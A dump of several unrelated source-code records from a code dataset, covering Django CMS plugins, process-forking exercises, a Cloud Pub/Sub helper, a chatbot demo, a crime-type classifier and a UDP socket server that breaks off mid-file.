StandoutItems\n\nclass CMSStandoutItemsPlugin(CMSPluginBase):\n model = StandoutItemsPlugin\n name = _(\"Responsive standout\")\n render_template = BASE_TEMPLATE_PATH + \"plugin/dynamic-entities.html\"\n inlines = (StandoutItemsInline,)\n \n def render(self, context, instance, placeholder):\n \n context.update({\n 'template_path' : BASE_TEMPLATE_PATH + instance.template(),\n 'entities' : instance.standout_items.all(),\n 'object':object,\n 'settings': instance\n })\n return context\n\n\n\n\n\n\nclass CMSParallaxPlugin(CMSPluginBase):\n model = ParallaxPlugin\n name = _(\"Responsive Parallax\")\n render_template = BASE_TEMPLATE_PATH + \"plugin/dynamic-default.html\"\n \n def render(self, context, instance, placeholder):\n context.update({\n 'template_path' : BASE_TEMPLATE_PATH + instance.template(),\n 'object':object,\n 'settings': instance\n })\n return context\n \n \n\n\n \nclass CMSCalloutPlugin(CMSPluginBase):\n model = CalloutPlugin\n name = _(\"Responsive callout\")\n render_template = BASE_TEMPLATE_PATH + \"plugin/dynamic-default.html\"\n \n def render(self, context, instance, placeholder):\n context.update({\n 'template_path' : BASE_TEMPLATE_PATH + instance.template(),\n 'object':object,\n 'settings': instance\n })\n return context\n \n\n\nplugin_pool.register_plugin(CMSParallaxPlugin) \nplugin_pool.register_plugin(CMSDividerPlugin)\nplugin_pool.register_plugin(CMSFeaturedBoxesPlugin)\nplugin_pool.register_plugin(CMSStandoutItemsPlugin)\nplugin_pool.register_plugin(CMSCalloutPlugin)\n","sub_path":"cms_responsive/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"238496255","text":"from django.forms import fields, models, formsets, widgets\nfrom .models import Order, OrderedItem\nfrom dal import autocomplete\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Div, Submit, HTML, Button, Row, Field\nfrom crispy_forms.bootstrap import FormActions\n\n\nclass OrderForm(models.ModelForm):\n def __init__(self, *args, **kwargs):\n super(OrderForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n\n self.helper.form_tag = False\n\n self.helper.template = 'bootstrap4/display_form.html'\n class Meta:\n model = Order\n fields = '__all__'\n\n\nclass OrderedItemForm(models.ModelForm):\n def __init__(self, *args, **kwargs):\n super(OrderedItemForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n # self.helper.form_class = 'form-horizontal'\n self.helper.template = 'bootstrap3/table_inline_formset.html'\n #self.helper.form_show_labels = False\n self.helper.form_tag = False\n\n # self.helper.form_group_wrapper_class = 'row'\n # self.helper.template = 'bootstrap4/table_inline_formset.html'\n\n class Meta:\n model = OrderedItem\n fields = '__all__'\n widgets = {\n 'product': autocomplete.ModelSelect2(url='formset_demo:product_select')\n }\n","sub_path":"formset_demo/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"438887810","text":"import os\nimport time\n\n# pid=os.fork()\n# if pid:\n# print(\"parent...\")\n# time.sleep(60)\n# else:\n# print(\"son...\")\n# time.sleep(15)\n#\n# # watch -n1 ps a\n# start=time.time()\n# print('start...')\n# pid=os.fork()\n# if pid:\n# print('in parent...')\n# print(os.waitpid(-1,0)) # gua qi fu jin cheng,bu hui chan sheng jiang shi jin cheng\n# time.sleep(30)\n# else:\n# print('in child')\n# time.sleep(10)\n# end=time.time()\n# print(end-start)\n\n# start=time.time()\n# print('start...')\n# pid=os.fork()\n# if pid:\n# print('in parent...')\n# print(os.waitpid(-1,1)) # bu gua qi fu jin cheng,hui chan sheng jiang shi jin cheng\n# time.sleep(30)\n# else:\n# print('in child')\n# time.sleep(10)\n# end=time.time()\n# print(end-start)\n\n# def zb(t):\n# print('in child ...')\n# time.sleep(t)\n# exit()\n#\n# pid=os.fork()\n# if not pid:\n# zb(15)\n#\n# zb(30)\n# import os\n# print(\"hello world\")\n# pid=os.fork()\n# if not pid:\n# print(\"child\")\n# else:\n# print(\"father\")\n#\n# print(\"all\")\n\n# import os\n# for i in range(3):\n# pid=os.fork()\n# if not pid:\n# print(\"child\")\n# exit()\n# print('down')\n\n# import os\n# import time\n# start=time.time()\n#\n# print(\"Start...\")\n# pid=os.fork()\n# if pid:\n# print(\"in parent...\")\n# print(os.waitpid(-1,0))\n# time.sleep(30)\n# else:\n# print(\"in child...\")\n# time.sleep(10)\n#\n# end=time.time()\n# print(end-start)\n\nimport os\nimport time\n\ndef zb(t):\n print(\"in child ...\")\n time.sleep(t)\n exit()\n\npid=os.fork()\nif not pid:\n print('in child ...')\n time.sleep(15)\n exit()\npid=os.fork()\nif not pid:\n print(\"in child2\")\n time.sleep(20)\n exit()\ntime.sleep(25)\nprint(os.waitpid(-1,1))\ntime.sleep(10)","sub_path":"n3_devops/day01/no2_zb.py","file_name":"no2_zb.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"589209105","text":"# Copyright 2015 The Swarming Authors. All rights reserved.\n# Use of this source code is governed by the Apache v2.0 license that can be\n# found in the LICENSE file.\n\n\"\"\"Helper functions for working with Cloud Pub/Sub.\"\"\"\n\nimport base64\nimport logging\nimport re\n\nfrom google.appengine.ext import ndb\nimport webapp2\n\nfrom components import net\n\n\nPUBSUB_BASE_URL = 'https://pubsub.googleapis.com/v1/projects'\nPUBSUB_SCOPES = (\n 'https://www.googleapis.com/auth/pubsub',\n)\n\n\ndef validate_topic(topic):\n \"\"\"Ensures the given topic is valid for Cloud Pub/Sub.\"\"\"\n # Technically, there are more restrictions for topic names than we check here,\n # but the API will reject anything that doesn't match. We only check / in case\n # the user is trying to manipulate the topic into posting somewhere else (e.g.\n # by setting the topic as ../..//topics/.\n return '/' not in topic\n\n\ndef validate_project(project):\n \"\"\"Ensures the given project is valid for Cloud Pub/Sub.\"\"\"\n return validate_topic(project)\n\n\ndef ensure_topic_exists(topic, project):\n \"\"\"Ensures the given Cloud Pub/Sub topic exists in the given project.\n\n Args:\n topic: Name of the topic which should exist.\n project: Name of the project the topic should exist in.\n \"\"\"\n try:\n net.json_request(\n '%s/%s/topics/%s' % (PUBSUB_BASE_URL, project, topic),\n method='PUT',\n scopes=PUBSUB_SCOPES,\n )\n except net.Error as e:\n if e.status_code != 409:\n # 409 is the status code when the topic already exists.\n # Ignore 409, but raise any other error.\n raise\n\n\ndef _publish(topic, project, message, **attributes):\n \"\"\"Publish messages to Cloud Pub/Sub.\n\n Args:\n topic: Name of the topic to publish to.\n project: Name of the project the topic exists in.\n message: Content of the message to publish.\n **attributes: Any attributes to send with the message.\n \"\"\"\n net.json_request(\n '%s/%s/topics/%s:publish' % (PUBSUB_BASE_URL, project, topic),\n method='POST',\n payload={\n 'messages': [\n {\n 'attributes': attributes,\n 'data': base64.b64encode(message),\n },\n ],\n },\n scopes=PUBSUB_SCOPES,\n )\n\n\ndef publish(topic, project, message, **attributes):\n \"\"\"Publish messages to Cloud Pub/Sub. Creates the topic if it doesn't exist.\n\n Args:\n topic: Name of the topic to publish to.\n project: Name of the project the topic should exist in.\n message: Content of the message to publish.\n **attributes: Any attributes to send with the message.\n \"\"\"\n try:\n _publish(topic, project, message, **attributes)\n except net.Error as e:\n if e.status_code == 404:\n # Topic does not exist. Try to create it.\n ensure_topic_exists(topic, project)\n try:\n net.json_request(\n '%s/%s/topics/%s' % (PUBSUB_BASE_URL, project, topic),\n method='PUT',\n scopes=PUBSUB_SCOPES,\n )\n except net.Error as e:\n if e.status_code != 409:\n # 409 is the status code when the topic already exists (maybe someone\n # else created it just now). Ignore 409, but raise any other error.\n raise\n # Retransmit now that the topic is created.\n _publish(topic, project, message, **attributes)\n else:\n # Unknown error.\n raise\n\n\nclass PushSubscriptionHandler(webapp2.RequestHandler):\n \"\"\"Base class for defining Pub/Sub push subscription handlers.\"\"\"\n # TODO(smut): Keep in datastore. See components/datastore_utils.\n ENDPOINT = None\n SUBSCRIPTION = None\n SUBSCRIPTION_PROJECT = None\n TOPIC = None\n TOPIC_PROJECT = None\n\n @classmethod\n def _subscribe(cls):\n \"\"\"Subscribes to a Cloud Pub/Sub project.\"\"\"\n net.json_request(\n '%s/%s/subscriptions/%s' % (\n PUBSUB_BASE_URL,\n cls.SUBSCRIPTION_PROJECT,\n cls.SUBSCRIPTION,\n ),\n method='PUT',\n payload={\n 'topic': 'projects/%s/topics/%s' % (cls.TOPIC_PROJECT, cls.TOPIC),\n 'pushConfig': {'pushEndpoint': cls.ENDPOINT},\n },\n scopes=PUBSUB_SCOPES,\n )\n\n @classmethod\n def ensure_subscribed(cls):\n \"\"\"Ensures a Cloud Pub/Sub subscription exists.\"\"\"\n try:\n cls._subscribe()\n except net.NotFoundError:\n # Topic does not exist. Try to create it.\n ensure_topic_exists(cls.TOPIC, cls.TOPIC_PROJECT)\n # Retransmit now that the topic is created.\n cls._subscribe()\n except net.Error as e:\n if e.status_code != 409:\n # 409 is the status code when the subscription already exists.\n # Ignore 409, but raise any other error.\n raise\n\n def post(self):\n \"\"\"Handles a Pub/Sub push message.\"\"\"\n # TODO(smut): Ensure message came from Cloud Pub/Sub.\n # Since anyone can post to this endpoint, we need to ensure the message\n # actually came from Cloud Pub/Sub. Unfortunately, there aren't any\n # useful headers set that can guarantee this.\n attributes = self.request.json.get('message', {}).get('attributes', {})\n message = self.request.json.get('message', {}).get('data', '')\n subscription = self.request.json.get('subscription')\n\n if subscription != 'projects/%s/subscriptions/%s' % (\n self.SUBSCRIPTION_PROJECT, self.SUBSCRIPTION):\n self.response.headers['Content-Type'] = 'text/plain; charset=utf-8'\n logging.error('Ignoring unexpected subscription: %s', subscription)\n self.abort(403, 'Unexpected subscription: %s' % subscription)\n return\n\n logging.info(\n 'Received Pub/Sub message:\\n%s\\nAttributes:\\n%s', message, attributes)\n return self.process_message(subscription, message, attributes)\n\n def process_message(self, subscription, message, attributes):\n \"\"\"Process a Pub/Sub message.\n\n Args:\n subscription: Name of the subscription this message is associated with.\n message: The message string.\n attributes: A dict of key/value pairs representing attributes associated\n with this message.\n\n Returns:\n A webapp2.Response instance, or None.\n \"\"\"\n raise NotImplementedError()\n","sub_path":"appengine/components/components/pubsub.py","file_name":"pubsub.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"247543318","text":"# -*- coding: utf-8 -*-\nfrom chatterbot import ChatBot\n\n# Uncomment the following lines to enable verbose logging\n# import logging\n# logging.basicConfig(level=logging.INFO)\n\n# Create a new instance of a ChatBot\nbot = ChatBot(\n \"SQLMemoryTerminal\",\n storage_adapter='chatterbot.storage.SQLStorageAdapter',\n logic_adapters=[\n \"chatterbot.logic.MathematicalEvaluation\",\n \"chatterbot.logic.TimeLogicAdapter\",\n \"chatterbot.logic.BestMatch\"\n ],\n input_adapter=\"chatterbot.input.TerminalAdapter\",\n output_adapter=\"chatterbot.output.TerminalAdapter\",\n)\n\nprint(\"Type something to begin...\")\n\n# The following loop will execute each time the user enters input\nwhile True:\n try:\n # We pass None to this method because the parameter\n # is not used by the TerminalAdapter\n bot_input = bot.get_response(None)\n\n # Press ctrl-c or ctrl-d on the keyboard to exit\n except (KeyboardInterrupt, EOFError, SystemExit):\n break\n","sub_path":"AnemoNLP/App/MLBot/sql/memory_sql_example.py","file_name":"memory_sql_example.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"685891","text":"import pandas as pd\nimport numpy as np\nimport datetime\nfrom sklearn.cluster import KMeans\nimport math\nimport random\nimport pickle\nfrom bagger import Bagger\n\n\ncrimes_dict = {0: 'BATTERY', 1: 'THEFT', 2: 'CRIMINAL DAMAGE', 3: 'DECEPTIVE PRACTICE', 4: 'ASSAULT'}\ncrimes_dict_rev = {'BATTERY' : 0, 'THEFT': 1, 'CRIMINAL DAMAGE': 2, 'DECEPTIVE PRACTICE': 3, 'ASSAULT': 4}\nout_str = {\"STREET\", \"SIDEWALK\", \"PARKING\", \"ALLEY\", \"VEHICLE\", \"STATION\",\n \"TRAIN\", \"BUS\", \"DRIVEWAY\", \"PARK\", \"PLATFORM\", \"LAND\", \"LOT\", \"ATM\", \"SITE\", \"TRANSPORTATION\",\n \"RAILROAD\", \"HIGHWAY\", \"WATERFRONT\", \"TAXICAB\", \"BRIDGE\", \"MACHINE\", \"NEWSSTAND\", \"FOREST\", \"CEMETARY\", \"TRACKS\"}\nin_public_str = {\"STORE\", \"RESTAURANT\", \"HOTEL\", \"HOSPITAL\", \"BANK\", \"FACILITY\",\n \"BAR\", \"WORSHIP\", \"CURRENCY\", \"AIRPORT\", \"GOVERNMENT\", \"SCHOOL\",\n \"DEALERSHIP\", \"LIBRARY\", \"WASH\", \"BARBERSHOP\", \"BOWLING ALLEY\", \"ABANDONED BUILDING\", \"SHOP\"\n ,\"THEATER\", \"CREDIT\", }\nin_private_str = {\"APARTMENT\", \"RESIDENCE\", \"OFFICE\", \"HOME\", \"CLUB\", \"FACTORY\", \"WAREHOUSE\",\n \"DAY CARE\", \"FEDERAL\", \"AIRCRAFT\", \"UNIVERSITY\", \"COLLEGE\", \"JAIL\", \"ARENA\", \"POOL\", \"KENNEL\",\n }\nNIGHT_MIN_X_CORD = 1092706.0\nNIGHT_MAX_X_CORD = 1205112.0\nNIGHT_MIN_Y_CORD = 1813910.0\nNIGHT_MAX_Y_CORD = 1951493.0\n\n# NIGHT_MIN_X_CORD = 1092706.0\n# NIGHT_MAX_X_CORD = 1205112.0\n# NIGHT_MIN_Y_CORD = 1813910.0\n# NIGHT_MAX_Y_CORD = 1951493.0\n\n\n\ndef send_police_cars(X):\n \"\"\"\n Upon given a date, the function learns from the given date and previous\n data and predicts where should we send 30 cars throughout the day in order\n to prevents as much crime as possible!\n :param X: Date in correct form.\n :return: List of 30 tuples of (x, y, time) spot and time to place a police\n car for 30 minutes.\n \"\"\"\n with open(\"model.pkl\", 'rb') as file:\n model = pickle.load(file)\n\n df = model.train_data\n original_date = X[:11]\n month, day, year = int(X[:2]), int(X[3:5]), int(X[6:10])\n df = df.loc[:, [\"X Coordinate\", \"Y Coordinate\", \"Date\"]]\n df.dropna(inplace=True)\n\n date_df = df[\"Date\"].apply(lambda x: x[:10])\n date_df = date_df.apply(lambda x: datetime.date(int(x[6:10]), int(x[0:2]), int(x[3:5])).weekday())\n time = df[\"Date\"].apply(lambda x: int(x[11:13]) if x[20:] == \"AM\" else int(x[11:13]) + 12)\n del df[\"Date\"]\n df = df.join(time)\n df.rename(columns={\"Date\": \"Time\"}, inplace=True)\n df = df.join(date_df)\n df.rename({\"Date\": \"Weekday\"}, axis=1, inplace=True)\n weekday = datetime.date(year, month, day).weekday()\n df = df[df[\"Weekday\"] == weekday]\n df.drop(\"Weekday\", inplace=True, axis=1)\n k_means = KMeans(30).fit(df.to_numpy())\n\n def fun(x):\n \"\"\"\n fun function - changes a numeric value to time with date prefix.\n \"\"\"\n x = str(x)\n i = x.find('.')\n if i == -1:\n x2 = \"00\"\n else:\n x2 = math.floor(float(x[2:]) * 60)\n if x2 >= 10:\n x2 -= 10\n x2 = str(x2)\n if len(x2) == 1:\n x2 = \"0\" + x2\n else:\n x2 = \"00\"\n x = x[:2]\n x1 = x\n x3 = \"00\"\n return original_date + x1 + \":\" + x2 + \":\" + x3\n\n time = np.array([fun(x) for x in k_means.cluster_centers_[:, -1]])\n xyt = k_means.cluster_centers_[:, : -1]\n time = time.reshape((30, 1))\n xyt = np.hstack((xyt, time))\n return list(map(tuple, xyt))\n\n\ndef preprocess(df):\n \"\"\"\n Pre-processes the given data, getting rid of unnecessary columns,\n as well as adjusts certain features and splits the data into 3\n based on the time of the day.\n :param df: The dataframe\n :return: 3 dataframes, each of samples corresponding to different\n times of the day (morning, noon and night).\n \"\"\"\n cols = df.columns\n if \"Unnamed: 0\" in cols:\n del df[\"Unnamed: 0\"]\n if \"Unnamed: 0.1\" in cols:\n del df[\"Unnamed: 0.1\"]\n del df[\"ID\"]\n del df[\"Case Number\"]\n del df[\"Year\"]\n del df[\"Updated On\"]\n del df[\"IUCR\"]\n del df[\"FBI Code\"]\n del df[\"Description\"]\n del df[\"Latitude\"]\n del df[\"Longitude\"]\n del df[\"Location\"]\n\n if \"Primary Type\" in cols:\n df.replace({\"Primary Type\": crimes_dict_rev}, inplace=True)\n\n outside = df[\"Location Description\"].to_frame()\n in_private = df[\"Location Description\"].to_frame()\n in_public = df[\"Location Description\"].to_frame()\n outside.rename(columns={\"Location Description\": \"out\"}, inplace=True)\n in_private.rename(columns={\"Location Description\": \"in_private\"}, inplace=True)\n in_public.rename(columns={\"Location Description\": \"in_public\"}, inplace=True)\n outside = outside.out.str.contains(\"|\".join(out_str)).to_frame()\n in_private = in_private.in_private.str.contains(\"|\".join(in_private_str)).to_frame()\n in_public = in_public.in_public.str.contains(\"|\".join(in_public_str)).to_frame()\n df = pd.concat([df, outside, in_private, in_public], axis=1)\n date_copy = df[\"Date\"].apply(lambda x: x[:10])\n phi_two = (2 * np.pi) / 7\n date_copy_two = date_copy.apply(lambda x: datetime.date(int(x[7:]), int(x[0:2]), int(x[3:5])).weekday())\n df[\"d1\"] = date_copy_two.apply(lambda x: np.cos(phi_two * x))\n df[\"d2\"] = date_copy_two.apply(lambda x: np.sin(phi_two * x))\n time_2 = df[\"Date\"].apply(lambda x: int(x[11:13]) + (int(x[14:16]) / 60) + (int(x[17:19]) / 3600))\n phi = (2 * np.pi) / 24\n df[\"X Time\"] = time_2.apply(lambda x: x * np.cos(phi))\n df[\"Y Time\"] = time_2.apply(lambda x: x * np.sin(phi))\n del df[\"Location Description\"]\n time = df[\"Date\"].apply(lambda x: int(x[11:13]) if x[20:] == \"AM\" else int(x[11:13]) + 12)\n del df[\"Date\"]\n df = df.join(time)\n df.rename(columns={\"Date\": \"Time\"}, inplace=True)\n morning = df[(df['Time'] >= 6) & (df['Time'] < 14)]\n noon = df[(df['Time'] >= 14) & (df['Time'] < 22)]\n night = df[((df['Time'] >= 22) & (df['Time'] <= 24) |\n (df['Time'] >= 0) & (df['Time'] < 6))]\n del morning[\"Time\"]\n del noon[\"Time\"]\n del night[\"Time\"]\n return morning, noon, night\n\n\ndef save_pickle():\n \"\"\"\n Creates a pickle file containing the class data fitted over a training\n data\n \"\"\"\n df = pd.read_csv(\"Dataset_crimes.csv\")\n df_extra = pd.read_csv(\"crimes_dataset_part2.csv\")\n df_extra.reset_index(drop=True, inplace=True)\n df = pd.concat([df, df_extra], axis=0)\n model = Bagger(df)\n pkl_filename = \"model.pkl\"\n with open(pkl_filename, 'wb') as file:\n pickle.dump(model, file)\n\n\ndef split(df: pd.DataFrame):\n \"\"\"\n Splits the dataframe into the features and the response vector\n :param df: The dataframe\n :return: Matrix X of features and vector y of the corresponding responses\n \"\"\"\n y = df[\"Primary Type\"]\n X = df.drop([\"Primary Type\"], axis=1)\n return X.to_numpy(), y.to_numpy()\n\n\ndef coordinate_update(df, df_nan, index, row, coordinate):\n \"\"\"\n Updates coordinates given the axis aren't present in the sample data\n :param df: The dataframe of the trained model with no NaN values\n :param df_nan: The dataframe of the test data\n :param index: The index of the sample in the df_nan\n :param row: The row itself of the index in df_nan\n :param coordinate: On which coordinate to operate\n :return: None\n \"\"\"\n if not pd.isnull(row[\"Block\"]):\n frame = df[df[\"Block\"] == row[\"Block\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, coordinate] = frame.at[random.randint(0, frame.shape[0] - 1), coordinate]\n return\n if not pd.isnull(row[\"Beat\"]):\n frame = df[df[\"Beat\"] == row[\"Beat\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, coordinate] = frame.at[random.randint(0, frame.shape[0] - 1), coordinate]\n return\n if not pd.isnull(row[\"District\"]):\n frame = df[df[\"District\"] == row[\"District\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, coordinate] = frame.at[random.randint(0, frame.shape[0] - 1), coordinate]\n return\n if not pd.isnull(row[\"Ward\"]):\n frame = df[df[\"Ward\"] == row[\"Ward\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, coordinate] = frame.at[random.randint(0, frame.shape[0] - 1), coordinate]\n return\n if not pd.isnull(row[\"Community Area\"]):\n frame = df[df[\"Community Area\"] == row[\"Community Area\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, coordinate] = frame.at[random.randint(0, frame.shape[0] - 1), coordinate]\n return\n df_nan.at[index, coordinate] = random.randint(df[coordinate].min, df[coordinate].max)\n\n\ndef beat_update(df, df_nan, index, row):\n \"\"\"\n Re-creates the Beat parameter in the case it's not given in the data\n :param df: The dataframe of the trained model with no NaN values\n :param df_nan: The dataframe of the test data\n :param index: The index of the sample in the df_nan\n :param row: The row itself of the index of df_nan\n :return: None\n \"\"\"\n if not pd.isnull(row[\"District\"]):\n frame = df[df[\"Block\"] == row[\"Block\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Beat\"] = frame.at[random.randint(0, frame.shape[0] - 1), \"Beat\"]\n return\n if not pd.isnull(row[\"Ward\"]):\n frame = df[df[\"Ward\"] == row[\"Ward\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Beat\"] = frame.at[random.randint(0, frame.shape[0] -1), \"Beat\"]\n return\n if not pd.isnull(row[\"Community Area\"]):\n frame = df[df[\"Community Area\"] == row[\"Community Area\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Beat\"] = frame.at[random.randint(0, frame.shape[0] - 1), \"Beat\"]\n return\n df_c = df.copy()\n f1 = df_c[\"X Coordinate\"].apply(lambda x: str(x)[:3]).reset_index()\n f2 = df_c[\"Y Coordinate\"].apply(lambda y: str(y)[:3]).reset_index()\n df_c = df_c.reset_index()\n frame = df_c[(f1[\"X Coordinate\"] == str(df_nan.at[index, \"X Coordinate\"])[:3]) &\n (f2[\"Y Coordinate\"] == str(df_nan.at[index, \"Y Coordinate\"])[:3])].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Beat\"] = frame.at[random.randint(0, frame.shape[0] - 1), \"Beat\"]\n else:\n df_nan.at[index, \"Beat\"] = df.at[random.randint(0, df.shape[0] - 1), \"Beat\"]\n\n\ndef predict(X):\n \"\"\"\n Predicts the type of felony:\n 0: Battery, 1: Theft, 2: Criminal Damage, 3: Deceptive Practice, 4 :Assault\n :param X: The features matrix\n :return: The predicted response vector, based on the given matrix X\n \"\"\"\n with open(\"model.pkl\", 'rb') as file:\n model = pickle.load(file)\n df = model.train_data # the original data\n df_X = pd.read_csv(X)\n # code to extract a random time:\n date = df[\"Date\"].apply(lambda x: int(x[11:13]) if x[20:] == \"AM\" else int(x[11:13]) + 12)\n hours = np.array(date.value_counts().index.tolist())\n hours[hours == 24] = 0\n weights = date.value_counts().to_numpy()\n weights = weights / weights.sum()\n arrest = df[\"Arrest\"].value_counts().to_numpy()\n arrest = arrest / arrest.sum()\n dom = df[\"Domestic\"].value_counts().to_numpy()\n dom = dom / dom.sum()\n\n # code to extract all rows with NaN\n df_nan = df_X[df_X.isnull().any(axis=1)]\n for index, row in df_nan.iterrows():\n if pd.isnull(row[\"Date\"]):\n r = random.choices(hours, weights, k=1)\n df_nan.at[index, \"Date\"] = \"1/1/2021 {}:00\".format(r[0])\n\n if pd.isnull(row[\"Location Description\"]):\n df_nan.at[index, \"Location Description\"] = \"OTHER\"\n\n if pd.isnull(row[\"Arrest\"]):\n r = random.choices([False, True], arrest)\n df_nan.at[index, \"Arrest\"] = r[0]\n\n if pd.isnull(row[\"Domestic\"]):\n r = random.choices([False, True], dom)\n df_nan.at[index, \"Domestic\"] = r[0]\n\n if np.isnan(row[\"X Coordinate\"]):\n coordinate_update(df, df_nan, index, row, \"X Coordinate\")\n\n if np.isnan(row[\"Y Coordinate\"]):\n coordinate_update(df, df_nan, index, row, \"Y Coordinate\")\n\n if pd.isnull(row[\"Beat\"]):\n beat_update(df, df_nan, index, row)\n\n if pd.isnull(row[\"District\"]):\n size = str(df_nan.at[index, \"Beat\"])\n df_nan.at[index, \"District\"] = int(size[:1]) if len(size) == 3 else int(size[:2])\n\n if pd.isnull(row[\"Ward\"]):\n frame = df[df[\"District\"] == df_nan.at[index, \"District\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Ward\"] = frame.at[random.randint(0, frame.shape[0] - 1), \"Ward\"]\n else:\n df_nan.at[index, \"Ward\"] = df.at[random.randint(0, df.shape[0] - 1), \"Ward\"]\n if pd.isnull(row[\"Community Area\"]):\n frame = df[df[\"Ward\"] == df_nan.at[index, \"Ward\"]].reset_index()\n if frame.shape[0] != 0:\n df_nan.at[index, \"Community Area\"] = \\\n frame.at[random.randint(0, frame.shape[0] - 1), \"Community Area\"]\n else:\n df_nan.at[index, \"Community Area\"] = \\\n df.at[random.randint(0, df.shape[0] - 1), \"Community Area\"]\n\n df_X.loc[df_nan.index] = df_nan\n cols = df_X.columns\n if \"Primary Type\" in cols:\n del df_X[\"Primary Type\"]\n del df_X[\"Block\"]\n size = df_X.shape[0]\n df_X.insert(0, \"i\", np.arange(size))\n morning, noon, night = preprocess(df_X)\n morn_arr = morning[\"i\"].to_numpy()\n noon_arr = noon[\"i\"].to_numpy()\n night_arr = night[\"i\"].to_numpy()\n del morning[\"i\"]\n del noon[\"i\"]\n del night[\"i\"]\n morning = model.grid_for_test(morning, model.morn_x_max, model.morn_x_min, model.morn_y_max,\n model.morn_y_min, model.morning_grid)\n noon = model.grid_for_test(noon, model.noon_x_max, model.noon_x_min, model.noon_y_max,\n model.noon_y_min, model.noon_grid)\n night = model.grid_for_test(night, model.night_x_max, model.night_x_min, model.night_y_max,\n model.night_y_min, model.night_grid)\n final = np.zeros(size)\n if morning.shape[0] != 0:\n morn_final = model.morning_bagger.predict(morning)\n final[morn_arr] = morn_final\n if noon.shape[0] != 0:\n noon_final = model.noon_bagger.predict(noon)\n final[noon_arr] = noon_final\n if night.shape[0] != 0:\n night_final = model.night_bagger.predict(night)\n final[night_arr] = night_final\n return final\n\n\ndef create_files(path):\n \"\"\"\n Divides the data into 3 sets: Train, Validation and Test\n :param path: The path to the given file (in csv format)\n \"\"\"\n df = pd.read_csv(path)\n train = df.sample(frac=0.70)\n df = df.drop(train.index)\n test = df.sample(frac=0.10)\n valid = df.drop(test.index)\n test.to_csv(\"test.csv\")\n train.to_csv(\"train.csv\")\n valid.to_csv(\"validation.csv\")\n","sub_path":"task2/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":15054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"634089747","text":"#-------------------SOCKET PROGRAMMING-------------------\n#Krijimi i server aplikacionit \n\nimport socket #Importojme librarine per socket komunikim ne mes te klientit dhe serverit \nimport threading #Importojme librarine per thread-a\nimport random #Importojme librarine per marrjen e vlerave te rastesishme \nimport math #Importojme librarine per funksione matematikore \nimport re #Importojme librarine per regular expression (shprehje te rregullta)\nfrom datetime import datetime #Klasa datetime per daten dhe kohen \n\nserverName = '127.0.0.1' #IP \nserverPort = 14000 #Porti\naddress=(serverName,serverPort) #Adresa eshte qift i hostit dhe portit \n\n#Krijimi i soketit. Argumentet e pasuara ne socket () specifikojne familjen e adresave dhe llojin e soketit\n#AF_INET eshte familja e adresave per IPv4. SOCK_DGRAM eshte lloji i soketit per UDP protokollin\ntry:\n serverSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nexcept socket.error as err: #Nese ndodh gabim, shfaqet gabimi dhe mbyllet sistemi\n print(\"Soketi nuk ka mundur te krijohet!\") \n print(str(err))\n time.sleep(1)\n sys.exit()\n\ntry: #Serveri tenton te lidhet me klientin permes metodes bind(), ku si parameter e merr adresen(hosti,porti)\n serverSocket.bind(address)\n print(\"\\nServeri eshte startuar ne localhost ne portin \" + str(serverPort)+\".\")\n print(\"\\nServeri eshte duke punuar dhe eshte duke pritur per ndonje kerkese!\")\nexcept socket.error as err: #Nese ndodh gabim gjate lidhjes, shfaqet gabimi\n print(str(err))\n \ndef IP(): #Metoda IP kthen IP adresen e klientit\n return \"IP adresa e klientit eshte: \"+str(addr[0])\n\ndef NRPORTIT(): #Metoda NRPORTIT kthen portin e klientit\n return \"Klienti eshte duke perdorur portin: \"+str(addr[1])\n\ndef ANASJELLTAS(x): #Metoda ANASJELLTAS tekstin e dhene e kthen anasjelltas (reverse)\n x=re.sub(r\"^\\s+|\\s+$\", \"\", x)\n if len(x)==1 or len(x)==0:\n return \"Keni dhene vetem zbrazetira ose/dhe vetem nje karakter\"\n else:\n return \"Teksti i kthyer anasjelltas: \"+ x[::-1] \n \ndef PALINDROM(text): #Metoda PALINDROM tregon nese teksti shkruhet njejt ne te dyja anet, eshte palindrom\n text = re.sub(r'[^a-zA-Z]','',text)\n reversedText=text[::-1] \n if reversedText==text: \n return \"Teksti i dhene eshte palindrom.\"\n else: \n return \"Teksti i dhene nuk eshte palindrom.\"\n\ndef LOJA(): #Metoda LOJA kthen 5 numra te rastesishem dhe te sortuar nga 1-35\n listOfNumbers = []\n for number in range(0,5):\n number = random.randint(1,35)\n listOfNumbers.append(number) \n listOfNumbers.sort()\n return \"5 numra te plote dhe te sortuar, nga rangu 1-35:\\n\"+str(listOfNumbers)\n\ndef KOHA(): #Metoda KOHA kthen daten dhe kohen aktuale te serverit \n currDateTime=datetime.now()\n currDateTimeFormat=currDateTime.strftime(\"%d/%m/%Y, %H:%M:%S\")\n return \"Data dhe koha aktuale: \"+currDateTimeFormat\n \ndef 